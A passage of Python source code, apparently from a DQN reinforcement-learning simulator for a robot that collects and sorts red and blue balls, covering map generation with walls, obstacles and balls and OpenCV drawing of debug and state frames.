In map scale (Shown using green line)\ny_disable_move = 5 # in map scale\nR_BALL = 0.75\nR_X = 1.5\nR_Y = 2.5\nCOLLECT_X = 1.5\nCOLLECT_Y = 1\n\n## 5cm per 1 map pixel ## when simulator resol is 3, 15cm per 1 simulator pixel \nmargin = 4 ## MARGIN \nball_margin = 10\nRan_wall = 20 # random lengthen wall size (늘어난 벽의 길이)\nobstacle_base = 2/5*map_param[\"height\"] ## \nobstacle_length = int(2/5*map_param[\"width\"]) ##\n\n# DQN 
-----------------------------------------------------------------------------------------\nmax_iter = 1000 # Why only 99?\nreward_region_x = [-1,0,1] # In simulator scale\nreward_region_y = 3 # In simulator scale\n\n# We also want to train the sorting plate so that it can move properly when it detect the color of the ball\nsorting_plate_state_dic = {'NULL': 0, 'RED': 1, 'BLUE': 2}\n\nclass Task:\n def __init__(self, debug_flag=False, test_flag=False, state_blink=True, state_inaccurate=True):\n # This is in simulator scale\n self.frame = np.zeros((simulator[\"height\"], simulator[\"width\"], 1), np.uint8)\n self.frame_gray = np.zeros((simulator[\"height\"]*debug_scale_gray, simulator[\"width\"]*debug_scale_gray, 1), np.uint8)\n # This is in map scale\n self.balls = []\n self.index_prev = -1 # Add by myself\n self.red_balls = []\n self.blue_balls = []\n self.red_balls_prev = []\n self.blue_balls_prev = []\n self.obstacles = []\n # For ...\n self.episode_rewards = []\n self.score = 0\n self.iter = 0\n self.sorting_plate_state = sorting_plate_state_dic['RED']\n self.num_state_after_pick = 0\n self.done = False\n # For ...\n self.write_flag = False\n self.debug_flag = debug_flag\n self.test_flag = test_flag\n self.ball_inscreen_flag = 0\n self.state_blink = state_blink\n self.state_inaccurate = state_inaccurate\n # DQN parameters\n self.observation_space = self.frame_gray.copy()\n self.action_space = np.array(range(12))\n # ROS\n # rospack = rospkg.RosPack()\n # root = rospack.get_path('tt_rl_motion_planner')\n # path = root+\"/config/map_gen.yaml\"\n path = \"./map_gen.yaml\"\n stream = open(path, 'r')\n self._params = yaml.load(stream)\n # Add by myself\n self.current_reward = 0\n return\n\n def reset(self, max_balls=10, max_walls=2):\n self.frame = np.zeros((simulator[\"height\"], simulator[\"width\"], 1), np.uint8)\n self.frame_gray = np.zeros((simulator[\"height\"]*debug_scale_gray, simulator[\"width\"]*debug_scale_gray, 1), np.uint8)\n self.balls = []\n self.index_prev = -1 # Add by myself\n self.red_balls = []\n self.blue_balls = []\n self.red_balls_prev = []\n self.blue_balls_prev = []\n self.obstacles = []\n self.score = 0\n self.iter = 0\n self.sorting_plate_state = sorting_plate_state_dic['RED']\n self.num_state_after_pick = 0\n self.done = False\n self.write_flag = False\n self.ball_inscreen_flag = 0\n\n # 비디오 녹화 주기를 줄여주었다.\n if len(self.episode_rewards)%200 == 0 and not self.test_flag:\n self.write_flag = True\n out_directory = \"data/video/tt.video.\"+format(len(self.episode_rewards)/200,\"08\")+\".mp4\"\n\n if self.test_flag:\n self.write_flag = True\n out_directory = \"data/video_test/tt.video.\"+format(len(self.episode_rewards),\"08\")+\".mp4\"\n\n if self.write_flag:\n codec = cv2.VideoWriter_fourcc(*'mp4v')\n fps = 10\n self.video = cv2.VideoWriter(out_directory, codec, fps, (simulator[\"width\"]*debug_scale,simulator[\"height\"]*debug_scale))\n\n # map_param simulator\n # ^\n # | y\n # +-------------------+\n # | \\ | |\n # | \\i_t| | +----------------+\n # | \\ | | w_h | |\n # | \\ | | | |\n # | \\| | | |\n # | +---------|-----> x +-----------+ | |\n # | | | | | | frame_gray |\n # | | | | | | |\n # | | | | frame | | |\n # | | | | | | |\n # | | | | | | |\n # +-------------------+ +-----------+ +----------------+\n # w_w = frame X debug_scale_gray\n\n # Rotate everything to robot's frame\n # [x'] = [ cos sin][x - r_x]\n # [y'] [-sin cos][y - r_y]\n \n # Create environment (In map scale)\n walls_initial = []\n obstacles_initial = []\n obstacles_temp = []\n i_t = 
random.random()*np.pi - np.pi/2 # initial random theta, the angle difference with map orientation and car orientation.\n ran_obs = random.random()\n rand_map = random.random()\n\n # if rand_map <= 0.333:\n # # map without walls nor obstacles\n # w_w = map_param[\"width\"]\n # w_h = map_param[\"height\"]\n # r_x = (random.random()-0.5)*(w_w - 2*margin) # initial robot rx map base\n # r_y = -(w_h-2*margin)/2 + random.random()*(obstacle_base-2*margin) # initial robot ry map base\n # walls_initial = []\n # else:\n # if rand_map >= 0.666:\n # # map with walls only\n # w_w = map_param[\"width\"] + round(random.random()*Ran_wall) # random wall width\n # w_h = map_param[\"height\"] + round(random.random()*Ran_wall) # random wall height\n # r_x = (random.random()-0.5)*(w_w - 2*margin) # initial robot rx map base\n # r_y = -(w_h-2*margin)/2 + random.random()*(obstacle_base-2*margin) # initial robot ry map base\n # else:\n # map with walls and obstacles\n w_w = map_param[\"width\"] + round(random.random()*Ran_wall)\n w_h = map_param[\"height\"] + round(random.random()*Ran_wall) + round(obstacle_base)\n r_x = (random.random()-0.5)*(w_w - 2*margin) # initial robot rx map base\n r_y = -(w_h-2*margin)/2 + random.random()*(obstacle_base-2*margin) # initial robot ry map base\n \n # Force debug ------------------------------------------------------------------------\n i_t = 0\n r_x = 0\n r_y = 0\n w_w = map_param[\"width\"]\n w_h = map_param[\"height\"]\n\n for i in range(obstacle_length):\n ox = (-w_w/2) + ran_obs*(w_w - obstacle_length) + i ##obstacle's x coordinate\n obstacles_initial.append([ox, -w_h/2 + obstacle_base]) \n for obstacle in obstacles_initial:\n x = obstacle[0]\n y = obstacle[1]\n t_x = np.cos(i_t)*(x - r_x) + np.sin(i_t)*(y - r_y)\n t_y = -np.sin(i_t)*(x - r_x) + np.cos(i_t)*(y - r_y)\n obstacles_temp.append([t_x, t_y])\n for i in range(w_w):\n cx = -round(w_w/2) + i\n cy = -round(w_h/2)\n walls_initial.append([cx, cy])\n for i in range(w_h):\n cx = -round(w_w/2) + w_w\n cy = -round(w_h/2) + i\n walls_initial.append([cx, cy])\n for i in range(w_w):\n cx = -round(w_w/2) + w_w - i\n cy = -round(w_h/2) + w_h\n walls_initial.append([cx, cy])\n for i in range(w_h):\n cx = -round(w_w/2)\n cy = -round(w_h/2) + w_h - i\n walls_initial.append([cx, cy])\n\n # Rotate everything to robot's frame\n # [x'] = [ cos sin][x - r_x]\n # [y'] [-sin cos][y - r_y]\n for wall in walls_initial:\n x = wall[0]\n y = wall[1]\n f_x = np.cos(i_t)*(x - r_x) + np.sin(i_t)*(y - r_y)\n f_y = -np.sin(i_t)*(x - r_x) + np.cos(i_t)*(y - r_y)\n obstacles_temp.append([f_x, f_y])\n\n for obstacle in obstacles_temp:\n cx = obstacle[0]\n cy = obstacle[1]\n self.obstacles.append([cx, cy])\n ##################### End of the Map constructing ###################\n\n # Place balls randomly\n for i in range(max_balls):\n cx = int(1.0*(2*random.random() - 1)*(w_w/2 - margin)) ## ball x-cor \n cy = int(-w_h/2 + obstacle_base + margin + random.random()*(w_h - obstacle_base - 2*margin)) ##ball y-cor\n f_x = np.cos(i_t)*(cx - r_x) + np.sin(i_t)*(cy - r_y)\n f_y = -np.sin(i_t)*(cx - r_x) + np.cos(i_t)*(cy - r_y)\n insert = True\n for b in self.red_balls:\n if (b[0]-f_x)*(b[0]-f_x) + (b[1]-f_y)*(b[1]-f_y) < (ball_margin)*(ball_margin): ##ball margin\n insert = False\n break\n for b in self.blue_balls:\n if (b[0]-f_x)*(b[0]-f_x) + (b[1]-f_y)*(b[1]-f_y) < (ball_margin)*(ball_margin):\n insert = False\n break\n if insert:\n if i < max_balls/2:\n self.red_balls.append([f_x,f_y])\n else:\n self.blue_balls.append([f_x,f_y])\n self.draw_state()\n\n 
return self.frame_gray\n\n def check_window_map(self, cx, cy):\n inscreen = True\n if cx < 0 or cx >= map_param[\"width\"]:\n inscreen = False\n if cy < 0 or cy >= map_param[\"height\"]:\n inscreen = False\n return inscreen\n\n def check_window_state(self, cx, cy):\n inscreen = True\n if cx < 0 or cx >= simulator[\"width\"]:\n inscreen = False\n if cy < 0 or cy >= simulator[\"height\"]:\n inscreen = False\n return inscreen\n\n def draw_debug_frame(self, frame):\n frame_debug = np.zeros((simulator[\"height\"]*debug_scale, simulator[\"width\"]*debug_scale, 3), np.uint8)\n # For reference\n\n # cv.rectangle\n # img Image.\n # pt1 Vertex of the rectangle.\n # pt2 Vertex of the rectangle opposite to pt1 .\n # color Rectangle color or brightness (grayscale image).\n # thickness Thickness of lines that make up the rectangle.\n # Negative values, like FILLED, mean that the function has to draw a filled rectangle.\n\n # cv.line\n # img Image.\n # pt1 First point of the line segment.\n # pt2 Second point of the line segment.\n # color Line color.\n # thickness Line thickness.\n # lineType Type of the line. See LineTypes.\n # shift Number of fractional bits in the point coordinates.\n \n # Draw the grid\n for i in range(1, simulator[\"width\"]):\n # Vertical grid\n cv2.line(frame_debug,\n (i*debug_scale, 0),\n (i*debug_scale, simulator[\"height\"]*debug_scale - 1),\n (50, 50, 50),\n 1)\n # Horizontal grid\n cv2.line(frame_debug,\n (0, i*debug_scale),\n (simulator[\"width\"]*debug_scale - 1, i*debug_scale),\n (50, 50, 50),\n 1)\n\n # Draw the obstacles\n for i in range(simulator[\"width\"]):\n for j in range(simulator[\"height\"]):\n if frame[i][j] == self._params[\"Map.data.obstacle\"]:\n cv2.rectangle(frame_debug,\n (i*debug_scale, j*debug_scale),\n ((i + 1)*debug_scale - 1, (j + 1)*debug_scale - 1),\n (255, 255, 0),\n -1)\n if frame[i][j] == self._params[\"Map.data.red_ball\"]:\n cv2.rectangle(frame_debug,\n (i*debug_scale, j*debug_scale),\n ((i + 1)*debug_scale - 1, (j + 1)*debug_scale - 1),\n (0, 0, 255),\n -1)\n # cv2.line(frame_debug,\n # ((simulator[\"center\"])*debug_scale - 1, (simulator[\"height\"] - back_pixels)*debug_scale),\n # (i*debug_scale, j*debug_scale),\n # (0, 0, 255),\n # 1)\n if frame[i][j] == self._params[\"Map.data.blue_ball\"]:\n cv2.rectangle(frame_debug,\n (i*debug_scale, j*debug_scale),\n ((i + 1)*debug_scale - 1, (j + 1)*debug_scale - 1),\n (255, 0, 0),\n -1)\n # cv2.line(frame_debug,\n # ((simulator[\"center\"])*debug_scale - 1, (simulator[\"height\"] - back_pixels)*debug_scale),\n # (i*debug_scale, j*debug_scale),\n # (255, 0, 0),\n # 1)\n \n # Center of the robot\n cv2.rectangle(frame_debug,\n (simulator[\"center\"]*debug_scale - 1, (simulator[\"height\"] - back_pixels)*debug_scale + 1),\n ((simulator[\"center\"] + 1)*debug_scale, (simulator[\"height\"] - (back_pixels - 1))*debug_scale - 1),\n (255, 0, 0) if self.sorting_plate_state == sorting_plate_state_dic['BLUE'] else (0, 0, 255),\n -1)\n # Boundary of the robot\n cv2.rectangle(frame_debug,\n ((simulator[\"center\"] - 1)*debug_scale - 1, (simulator[\"height\"] - (back_pixels + 2))*debug_scale + 1),\n ((simulator[\"center\"] + 2)*debug_scale, (simulator[\"height\"] - (back_pixels - 3))*debug_scale - 1),\n (0, 0, 255),\n 2)\n # Right line view angle\n cv2.line(frame_debug,\n ((simulator[\"center\"] + ball_blind_bias)*debug_scale, (simulator[\"height\"] - back_pixels)*debug_scale - 1),\n (simulator[\"width\"]*debug_scale - 1, ((simulator[\"height\"] - back_pixels) - int(ball_blind_slope*(simulator[\"center\"] - 1 - 
ball_blind_bias)))*debug_scale),\n (128, 128, 128),\n 1)\n # Left line view angle\n cv2.line(frame_debug,\n ((simulator[\"center\"] - ball_blind_bias + 1)*debug_scale, (simulator[\"height\"] - back_pixels)*debug_scale - 1),\n (0, (simulator[\"height\"] - back_pixels - int(ball_blind_slope*(simulator[\"center\"] - 1 - ball_blind_bias)))*debug_scale),\n (128, 128, 128),\n 1)\n # Text\n cv2.putText(frame_debug,\n \"Step \" + str(self.iter),\n (int(simulator[\"width\"]*debug_scale*0.05), int(simulator[\"width\"]*debug_scale*0.05)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.05*debug_scale,\n (255, 255, 255))\n cv2.putText(frame_debug,\n \"Score \" + str(self.score),\n (int(simulator[\"width\"]*debug_scale*0.05), int(simulator[\"width\"]*debug_scale*0.10)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.05*debug_scale,\n (255, 255, 255))\n cv2.putText(frame_debug,\n \"Reward \" + str(self.current_reward),\n (int(simulator[\"width\"]*debug_scale*0.05), int(simulator[\"width\"]*debug_scale*0.15)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.05*debug_scale,\n (255, 255, 255))\n\n return frame_debug\n \n def draw_environment(self):\n \"\"\"\n Draw:\n - Every thing stored in map_param, scaled up with DEBUG_SCALE_WIT\n - Path to the nearest seeable ball\n \"\"\"\n spare = 2\n frame_env = np.zeros((map_param[\"height\"]*DEBUG_SCALE_ENV*spare, map_param[\"width\"]*DEBUG_SCALE_ENV*spare, 3), np.uint8)\n f_cx = frame_env.shape[1]/2\n f_cy = frame_env.shape[0]/2\n # cv.drawMarker\n # img Image.\n # position\t The point where the crosshair is positioned.\n # color Line color.\n # markerType The specific type of marker you want to use, see MarkerTypes\n # markerSize The length of the marker axis [default = 20 pixels]\n # thickness Line thickness.\n # line_type Type of the line, See LineTypes\n\n # cv.circle\n # img Image where the circle is drawn.\n # center\t Center of the circle.\n # radius\t Radius of the circle.\n # color Circle color.\n # thickness\t Thickness of the circle outline, if positive. Negative values, like FILLED, mean that a filled circle is to be drawn.\n # lineType\t Type of the circle boundary. 
See LineTypes\n # shift\t Number of fractional bits in the coordinates of the center and in the radius value.\n \n # Vertical grid\n for i in range(1, spare*map_param[\"width\"]):\n cv2.line(frame_env,\n (i*DEBUG_SCALE_ENV, 0),\n (i*DEBUG_SCALE_ENV, map_param[\"height\"]*DEBUG_SCALE_ENV*spare - 1),\n (30, 30, 30),\n 1)\n # Horizontal grid\n for i in range(1, spare*map_param[\"height\"]):\n cv2.line(frame_env,\n (0, i*DEBUG_SCALE_ENV),\n (map_param[\"width\"]*DEBUG_SCALE_ENV*spare - 1, i*DEBUG_SCALE_ENV),\n (30, 30, 30),\n 1)\n # Center of the robot\n cv2.drawMarker(frame_env,\n (int(round(f_cx)), int(round(f_cy))),\n (0, 255, 0),\n cv2.MARKER_CROSS,\n 10)\n # Movable region\n cv2.rectangle(frame_env,\n (int(round(f_cx + R_X*DEBUG_SCALE_ENV)), int(round(f_cy - R_Y*DEBUG_SCALE_ENV))),\n (int(round(f_cx - R_X*DEBUG_SCALE_ENV)), int(round(f_cy + R_Y*DEBUG_SCALE_ENV))),\n (0, 255, 0),\n 1,\n 1)\n # Right line view angle\n cv2.line(frame_env,\n (int(round(f_cx + (ball_blind_bias_map)*DEBUG_SCALE_ENV)), int(round(f_cy))),\n (frame_env.shape[1], int(round(f_cy - ball_blind_slope*(f_cx - ball_blind_bias_map*DEBUG_SCALE_ENV)))),\n (128, 128, 128),\n 1)\n # Left line view angle\n cv2.line(frame_env,\n (int(round(f_cx - (ball_blind_bias_map)*DEBUG_SCALE_ENV)), int(round(f_cy))),\n (0, int(round(f_cy - ball_blind_slope*(f_cx - ball_blind_bias_map*DEBUG_SCALE_ENV)))),\n (128, 128, 128),\n 1)\n # Wall\n for obstacle in self.obstacles:\n cv2.drawMarker(frame_env,\n (int(round(f_cx + (obstacle[0])*DEBUG_SCALE_ENV)), int(round(f_cy - (obstacle[1])*DEBUG_SCALE_ENV))),\n (255, 255, 0),\n cv2.MARKER_DIAMOND,\n 5,\n 1)\n # Red balls\n for ball in self.red_balls:\n cv2.circle(frame_env,\n (int(round(f_cx + ball[0]*DEBUG_SCALE_ENV)), int(round(f_cy - (ball[1])*DEBUG_SCALE_ENV))),\n int(round(R_BALL*DEBUG_SCALE_ENV)),\n (0, 0, 255),\n -1)\n # Blue balls\n for ball in self.blue_balls:\n cv2.circle(frame_env,\n (int(round(f_cx + ball[0]*DEBUG_SCALE_ENV)), int(round(f_cy - (ball[1])*DEBUG_SCALE_ENV))),\n int(round(R_BALL*DEBUG_SCALE_ENV)),\n (255, 0, 0),\n -1)\n \n ball_list = self.red_balls + self.blue_balls\n if ball_list:\n ball_distances = np.sum(np.asarray(ball_list)**2, axis=1)\n sorted_indices = np.argsort(ball_distances)\n for index in sorted_indices:\n if in_camera_range(ball_list[index]) and no_wall_blocking([0, 0], ball_list[index], self.obstacles):\n if index < len(self.red_balls):\n cv2.line(frame_env,\n (int(round(f_cx)), int(round(f_cy))),\n (int(round(f_cx + self.red_balls[index][0]*DEBUG_SCALE_ENV)), int(round(f_cy - self.red_balls[index][1]*DEBUG_SCALE_ENV))),\n (0, 0, 255),\n 1)\n break\n else:\n index = index - len(self.red_balls)\n cv2.line(frame_env,\n (int(round(f_cx)), int(round(f_cy))),\n (int(round(f_cx + self.blue_balls[index][0]*DEBUG_SCALE_ENV)), int(round(f_cy - self.blue_balls[index][1]*DEBUG_SCALE_ENV))),\n (255, 0, 0),\n 1)\n break\n \n # Text --------------------------------------------------------------------------------\n cv2.putText(frame_env,\n \"Step \" + str(self.iter),\n (int(map_param[\"width\"]*DEBUG_SCALE_ENV*0.05), int(map_param[\"width\"]*DEBUG_SCALE_ENV*0.05)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.05*DEBUG_SCALE_ENV,\n (255, 255, 255))\n cv2.putText(frame_env,\n \"Score \" + str(self.score),\n (int(map_param[\"width\"]*DEBUG_SCALE_ENV*0.05), int(map_param[\"width\"]*DEBUG_SCALE_ENV*0.10)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.05*DEBUG_SCALE_ENV,\n (255, 255, 255))\n cv2.putText(frame_env,\n \"Reward \" + str(self.current_reward),\n (int(map_param[\"width\"]*DEBUG_SCALE_ENV*0.05), 
int(map_param[\"width\"]*DEBUG_SCALE_ENV*0.15)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.05*DEBUG_SCALE_ENV,\n (255, 255, 255))\n \n return frame_env\n \n def draw_debug_wit(self):\n \"\"\"\n Draw:\n - Every thing stored in map_param, scaled up with DEBUG_SCALE_WIT\n - Path to the nearest seeable ball\n \"\"\"\n frame_env = np.zeros((map_param[\"height\"]*DEBUG_SCALE_WIT, map_param[\"width\"]*DEBUG_SCALE_WIT, 3), np.uint8)\n # cv.drawMarker\n # img Image.\n # position\t The point where the crosshair is positioned.\n # color Line color.\n # markerType The specific type of marker you want to use, see MarkerTypes\n # markerSize The length of the marker axis [default = 20 pixels]\n # thickness Line thickness.\n # line_type Type of the line, See LineTypes\n\n # cv.circle\n # img Image where the circle is drawn.\n # center\t Center of the circle.\n # radius\t Radius of the circle.\n # color Circle color.\n # thickness\t Thickness of the circle outline, if positive. Negative values, like FILLED, mean that a filled circle is to be drawn.\n # lineType\t Type of the circle boundary. See LineTypes\n # shift\t Number of fractional bits in the coordinates of the center and in the radius value.\n \n # Draw the grid\n for i in range(1, map_param[\"width\"]):\n # Vertical grid\n cv2.line(frame_env,\n (i*DEBUG_SCALE_WIT, 0),\n (i*DEBUG_SCALE_WIT, map_param[\"height\"]*DEBUG_SCALE_WIT - 1),\n (30, 30, 30),\n 1)\n # Horizontal grid\n cv2.line(frame_env,\n (0, i*DEBUG_SCALE_WIT),\n (map_param[\"width\"]*DEBUG_SCALE_WIT - 1, i*DEBUG_SCALE_WIT),\n (30, 30, 30),\n 1)\n # Center of the robot\n cv2.drawMarker(frame_env,\n ((map_param[\"center\"])*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n (255, 255, 0),\n cv2.MARKER_CROSS,\n 10)\n # Movable region\n cv2.rectangle(frame_env,\n (int(round((map_param[\"center\"] - (R_X))*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (back_pixels_map + R_Y))*DEBUG_SCALE_WIT))),\n (int(round((map_param[\"center\"] + (R_X))*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (back_pixels_map - R_Y))*DEBUG_SCALE_WIT))),\n (0, 255, 0),\n 1,\n 1)\n # Right line view angle\n cv2.line(frame_env,\n ((map_param[\"center\"] + ball_blind_bias_map)*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n (map_param[\"width\"]*DEBUG_SCALE_WIT, int(round((map_param[\"height\"] - (back_pixels_map + ball_blind_slope*(map_param[\"center\"] - ball_blind_bias_map)))*DEBUG_SCALE_WIT))),\n (128, 128, 128),\n 1)\n # Left line view angle\n cv2.line(frame_env,\n ((map_param[\"center\"] - ball_blind_bias_map)*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n (0, int(round((map_param[\"height\"] - (back_pixels_map + ball_blind_slope*(map_param[\"center\"] - ball_blind_bias_map)))*DEBUG_SCALE_WIT))),\n (128, 128, 128),\n 1)\n # Wall\n for obstacle in self.obstacles:\n cv2.drawMarker(frame_env,\n (int(round((map_param[\"center\"] + (obstacle[0]))*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (obstacle[1] + back_pixels_map))*DEBUG_SCALE_WIT))),\n (255, 255, 0),\n cv2.MARKER_DIAMOND,\n 5,\n 1)\n # Red balls\n for ball in self.red_balls:\n cv2.circle(frame_env,\n (int(round((map_param[\"center\"] + (ball[0]))*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (ball[1] + back_pixels_map))*DEBUG_SCALE_WIT))),\n 1*DEBUG_SCALE_WIT,\n (0, 0, 255),\n -1)\n # cv2.line(frame_env,\n # ((map_param[\"center\"])*debug_scale, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n # (int(round((map_param[\"center\"] + 
ball[0])*debug_scale)), int(round((map_param[\"height\"] - (back_pixels_map + ball[1]))*debug_scale))),\n # (0, 0, 255),\n # 1)\n # Blue balls\n for ball in self.blue_balls:\n cv2.circle(frame_env,\n (int(round((map_param[\"center\"] + (ball[0]))*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (ball[1] + back_pixels_map))*DEBUG_SCALE_WIT))),\n 1*DEBUG_SCALE_WIT,\n (255, 0, 0),\n -1)\n # cv2.line(frame_env,\n # ((map_param[\"center\"])*debug_scale, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n # (int(round((map_param[\"center\"] + ball[0])*debug_scale)), int(round((map_param[\"height\"] - (back_pixels_map + ball[1]))*debug_scale))),\n # (255, 0, 0),\n # 1)\n \n ball_list = self.red_balls + self.blue_balls\n if ball_list:\n ball_distances = np.sum(np.asarray(ball_list)**2, axis=1)\n sorted_indices = np.argsort(ball_distances)\n for index in sorted_indices:\n if in_camera_range(ball_list[index]) and no_wall_blocking([0, 0], ball_list[index], self.obstacles):\n if index < len(self.red_balls):\n cv2.line(frame_env,\n ((map_param[\"center\"])*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n (int(round((map_param[\"center\"] + self.red_balls[index][0])*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (back_pixels_map + self.red_balls[index][1]))*DEBUG_SCALE_WIT))),\n (0, 0, 255),\n 1)\n break\n else:\n index = index - len(self.red_balls)\n cv2.line(frame_env,\n ((map_param[\"center\"])*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n (int(round((map_param[\"center\"] + self.blue_balls[index][0])*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (back_pixels_map + self.blue_balls[index][1]))*DEBUG_SCALE_WIT))),\n (255, 0, 0),\n 1)\n break\n\n # Can use funciton, but it's too slow\n # index = get_nearest_seeable_ball_index([0, 0], self.red_balls + self.blue_balls, self.obstacles)\n # if index != -1:\n # if index < len(self.red_balls):\n # print('Draw red')\n # cv2.line(frame_env,\n # ((map_param[\"center\"])*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n # (int(round((map_param[\"center\"] + self.red_balls[index][0])*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (back_pixels_map + self.red_balls[index][1]))*DEBUG_SCALE_WIT))),\n # (0, 0, 255),\n # 1)\n # else:\n # index = index - len(self.red_balls)\n # print('Draw blue')\n # cv2.line(frame_env,\n # ((map_param[\"center\"])*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n # (int(round((map_param[\"center\"] + self.blue_balls[index][0])*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (back_pixels_map + self.blue_balls[index][1]))*DEBUG_SCALE_WIT))),\n # (255, 0, 0),\n # 1)\n \n # Text --------------------------------------------------------------------------------\n cv2.putText(frame_env,\n \"Step \" + str(self.iter),\n (int(map_param[\"width\"]*DEBUG_SCALE_WIT*0.05), int(map_param[\"width\"]*DEBUG_SCALE_WIT*0.05)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.1*DEBUG_SCALE_WIT,\n (255, 255, 255))\n cv2.putText(frame_env,\n \"Score \" + str(self.score),\n (int(map_param[\"width\"]*DEBUG_SCALE_WIT*0.05), int(map_param[\"width\"]*DEBUG_SCALE_WIT*0.10)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.1*DEBUG_SCALE_WIT,\n (255, 255, 255))\n cv2.putText(frame_env,\n \"Reward \" + str(self.current_reward),\n (int(map_param[\"width\"]*DEBUG_SCALE_WIT*0.05), int(map_param[\"width\"]*DEBUG_SCALE_WIT*0.15)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.1*DEBUG_SCALE_WIT,\n (255, 255, 255))\n \n return frame_env\n\n def 
draw_state_gray(self):\n gray_color = {\"red_ball\":255, \"blue_ball\":220, \"wall\":100, \"robot\":200, \"robot_padding\":150}\n # 다음 교육에는 sorting plate 상태에 따라 gray에도 표시해줌\n # gray_color = {\"red_ball\":255, \"blue_ball\":220, \"wall\":100, \"robot_red\":200, \"robot_blue\":180, \"robot_padding\":150}\n self.frame_gray = np.zeros((simulator[\"height\"]*debug_scale_gray, simulator[\"width\"]*debug_scale_gray, 1), np.uint8)\n\n for i in range(simulator[\"width\"]):\n for j in range(simulator[\"height\"]):\n if self.frame[i][j] == self._params[\"Map.data.obstacle\"]:\n cv2.rectangle(self.frame_gray,\n (i*debug_scale_gray, j*debug_scale_gray),\n ((i + 1)*debug_scale_gray - 1, (j + 1)*debug_scale_gray - 1),\n gray_color[\"wall\"],\n -1)\n if self.frame[i][j] == self._params[\"Map.data.red_ball\"]:\n cv2.rectangle(self.frame_gray,\n (i*debug_scale_gray, j*debug_scale_gray),\n ((i + 1)*debug_scale_gray - 1, (j + 1)*debug_scale_gray - 1),\n gray_color[\"red_ball\"],\n -1)\n if self.frame[i][j] == self._params[\"Map.data.blue_ball\"]:\n cv2.rectangle(self.frame_gray,\n (i*debug_scale_gray, j*debug_scale_gray),\n ((i + 1)*debug_scale_gray - 1, (j + 1)*debug_scale_gray - 1),\n gray_color[\"blue_ball\"],\n -1)\n # Boundary of the robot (?)\n cv2.rectangle(self.frame_gray,\n ((simulator[\"center\"] - 1)*debug_scale_gray, (simulator[\"height\"] - (back_pixels + 2))*debug_scale_gray + 1),\n ((simulator[\"center\"] + 2)*debug_scale_gray, (simulator[\"height\"] - (back_pixels - 3))*debug_scale_gray - 1),\n gray_color[\"robot_padding\"],\n -1)\n # Center of the robot\n cv2.rectangle(self.frame_gray,\n (simulator[\"center\"]*debug_scale_gray, (simulator[\"height\"] - (back_pixels + 0))*debug_scale_gray + 1),\n ((simulator[\"center\"] + 1)*debug_scale_gray, (simulator[\"height\"] - (back_pixels - 1))*debug_scale_gray - 1),\n gray_color[\"robot\"],\n -1)\n \n # cv2.rectangle(self.frame_gray,\n # (simulator[\"center\"]*debug_scale_gray, (simulator[\"height\"] - (back_pixels + 0))*debug_scale_gray + 1),\n # ((simulator[\"center\"] + 1)*debug_scale_gray, (simulator[\"height\"] - (back_pixels - 1))*debug_scale_gray - 1),\n # gray_color[\"robot_blue\"] if self.sorting_plate_state == sorting_plate_state_dic['BLUE'] else gray_color[\"robot_red\"],\n # -1)\n\n return self.frame_gray\n\n def draw_state(self):\n self.frame = np.zeros((simulator[\"height\"], simulator[\"width\"], 1), np.uint8)\n # Wall\n for obstacle in self.obstacles:\n cx = simulator[\"center\"] + int(round(1.0*obstacle[0]/trans_scale))\n cy = simulator[\"height\"] - back_pixels - int(round(1.0*obstacle[1]/trans_scale))\n if self.check_window_state(cx, cy):\n self.frame[cx][cy] = self._params[\"Map.data.obstacle\"]\n # Red balls\n for r_ball in self.red_balls:\n if self.state_blink == False or random.random() > (0.3 + 0.5*r_ball[1]/3.0/(map_param[\"height\"]/2)):\n if r_ball[1] >= int(ball_blind_slope*(abs(1.0*r_ball[0])-ball_blind_bias)):\n r_ball_x = r_ball[0]\n r_ball_y = r_ball[1]\n if self.state_inaccurate:\n r_ball_x = r_ball_x + random.random()*map_param[\"center\"]*(0.1*r_ball_x*r_ball_x/map_param[\"center\"]/map_param[\"center\"] - 0.05)\n r_ball_y = r_ball_y + random.random()*map_param[\"center\"]*(0.1*r_ball_y*r_ball_y/map_param[\"center\"]/map_param[\"center\"] - 0.05)\n cx = simulator[\"center\"] + int(round(1.0*r_ball_x/trans_scale))\n cy = simulator[\"height\"] - back_pixels - int(round(1.0*r_ball_y/trans_scale))\n if self.check_window_state(cx, cy):\n self.frame[cx][cy] = self._params[\"Map.data.red_ball\"]\n # Blue balls\n for b_ball 
